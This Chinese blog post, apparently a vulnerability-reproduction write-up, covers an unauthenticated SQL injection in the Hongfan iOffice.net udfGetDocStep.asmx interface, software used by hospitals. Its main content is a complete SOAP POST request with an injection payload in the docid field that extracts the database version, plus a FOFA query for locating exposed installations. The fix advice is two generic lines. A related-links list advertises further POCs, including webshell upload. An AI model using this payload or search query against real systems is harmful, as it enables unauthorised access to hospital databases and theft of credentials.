红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞

最新推荐文章于 2024-06-20 15:09:06 发布
最新推荐文章于 2024-06-20 15:09:06 发布
阅读量406 收藏 2
点赞数 7
文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36334672/article/details/136649760
版权
本文描述了红帆iOffice.net中的SQL注入漏洞,攻击者可通过未认证接口获取敏感数据。建议升级至安全版本并部署防火墙进行防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.漏洞介绍

​ 红帆iOffice.net udfGetDocStep.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
--

4.检索特征

FOFA:app=“红帆-ioffice”
在这里插入图片描述

5.POC
POST /ioffice/prg/interface/udfGetDocStep.asmx HTTP/1.1
Host: vulIP
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetDocStep"
Content-Length: 565

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <GetDocStep xmlns="http://tempuri.org/">
        <docid>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</docid>
    </GetDocStep>
    </soap:Body>
</soap:Envelope>

查询数据库版本信息
在这里插入图片描述

6.修复建议

1.升级至安全版本。
2.部署Web应用防火墙,对数据库操作进行监控。

7.参考信息
漏洞复现】红帆-ioffice-udfGetDocStep-sql注入
知黑而守白
03-05 171
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice udfGetDocStep 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
红帆OA udfmr.asmx SQL注入漏洞复现
0xSec
08-18 4288
红帆iOffice.netudfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
红帆iOffice iorepsavexml.aspx接口存在任意文件上传漏洞 附POC
nnn2188185的博客
12-23 631
红帆iOffice iorepsavexml.aspx接口存在任意文件上传漏洞 附POC
漏洞复现】红帆OA iorepsavexml.aspx文件上传漏洞
失心少年
12-16 1167
广州红帆科技深耕医疗行业20余年,专注医院行政管控,与企业微信、阿里钉钉全方位结合,推出web移动一体化办公解决方案——iOffice20(医微云)。提供行政办公、专业科室应用、决策辅助等信息化工具,采取平台化管理模式,取代医疗机构过往多系统分散式管理,实现医院内各科室之间的快速分工合作,并通过整合各类管理应用,让医疗机构管理者随时随地把控医院的运营管理情况,同时为行政管理人员提供便捷多终端的移动协同工具,推进移动办公全面落地,深化互联网+医疗建设,成就面向医疗机构的“智慧管控”。
红帆ioffice ioassistance2.asmx sql注入
weixin_43567873的博客
03-10 186
红帆ioffice ioassistance2.asmx sql注入
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
nnn2188185的博客
03-04 310
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
漏洞复现】红帆iOffice.net wssRtSyn接口处存在SQL注入
2301_80127209的博客
06-20 1000
红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
漏洞复现-红帆OA iorepsavexml.aspx文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-24 2008
漏洞复现-红帆OA iorepsavexml.aspx文件上传漏洞,附带自己写的poc脚本
漏洞复现-红帆OA系列
aming小老弟
03-15 1757
红帆OA--------------------------------------------fofa:app=“红帆-ioffice
IOFFICE-E网络办公系统成功调试版(附SQL数据库)
02-23
源码空间
红帆OA iorepsavexml接口任意文件上传漏洞(含批量验证poc)_ ioffice prg set iocom iodoceditservernew
2401_83974370的博客
04-14 581
红帆OA,即红帆办公自动化系统,是一种基于微软.NET技术开发的办公自动化解决方案。它旨在解决企业或政府办公中遇到的“自动化孤岛”和“信息化孤岛”问题,提供支持信息访问、传递以及跨组织工作的集成化商务环境。红帆OA 存在任意文件上传漏洞,攻击者可通过此漏洞上传webshell木马,获取服务器控制权限。
漏洞复现】红帆-ioffice-ioFileDown-文件读取
知黑而守白
03-05 252
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice ioFileDown 接口存在一个任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。通过利用此漏洞,攻击者可能获得系统内的敏感信息,导致潜在的信息泄露风险。
office漏洞汇总
好好学习,天天向上
03-06 281
https://www.cnblogs.com/diligenceday/p/7898839.htmlhttps://cloud.tencent.com/developer/news/200097 CVE-2017-11882 https://blog.csdn.net/darkhq/article/details/79134981 CVE-2018-0802 噩梦公式二代复现https://ww...
暴力破解!ioffice.net 政务系统安装
影子'的专栏
04-17 3970
  单位的政务系统服务器要换了,所有系统盘可用空间就只有15M,晕,放几个word文档就挂了。服务器星期六下午到的货,呵呵,dell 2950 。配置还不错,因为所在的服务器机架只剩下最高的一层有空位了(目测在2米左右),和电脑公司的三个人好不容易才把服务器装去(服务器重10公斤,长1.2米,宽0.6米),然后是安装系统,软件,杀软,防火墙,驱动不用自己装,DELL的安装光盘做是就好啊,一次性引导
2023HW-8月(10-15)53个0day,1day漏洞汇总含POC、EXP
tangshuangsss的专栏
08-16 5391
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介2023HW-8月10-15号0day、1day漏洞汇总(已更新),包含以下漏洞需要自取。链接:https://pan.baidu.com/s/1Tr94yVFSHn_C6YiJcVprAw 提取码:6666通达OAsql注入漏洞 CVE-2023-4165 POC.. 2 通达OAsql注入漏洞 CVE-2023...
实战 | 攻防演练中某市医院的SQL注入
weixin_54787877的博客
05-25 1480
前言 这次演习中打算搞一手医院。 虽然漏洞已上报,但还是会打码。 攻击手法: SQL注入攻击 瓶颈难点: 1.主站 1.sqlmap无法读取数据表 2.无法使用os-shell来getshell 3.网站找不到绝对路径,sql-shell没法写shell 2.医院综合查询系统 有DBA权限但是不能os-shell。 网站找不到绝对路径,sql-shell没法写shell 大家有好思路可以评论一起交流一下哈。 实战过程 1.日常目测一波: 看到搜索框来试试SQL注入和XSS 输入个“单引号”直接中奖,真
iOffice.net核心在于管事、管人
weixin_34148508的博客
09-28 151
iOffice.net核心在于管事、管人 iOffice.net 写手 2005年8月   如果企业连内部沟通都没有解决,就谈不上信息管理。如何为企业构造一个高效安全、可管理的沟通平台才是信息管理的最主要特征。   在今天,企业信息化仍然是一项非常重要且艰巨的任务,尤其是企业中最关键的“人”和“人的活动”的信息化问题,是集中缺失的一大领域。   在过去,传统的ERP/...
漏洞复现】红帆-ioffice-wssRtSyn-sql注入
知黑而守白
03-05 151
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice wssRtSyn 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
红帆 zyy_AttFile SQL注入漏洞
最新发布
01-16
针对红帆 OA 系统中存在的多个 SQL 注入漏洞,官方已经意识到这些问题并发布了相应的安全更新。对于具体的 `zyy_AttFile` 接口存在SQL 注入风险,建议采取如下措施来保障系统的安全性: #### 升级到最新版本 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值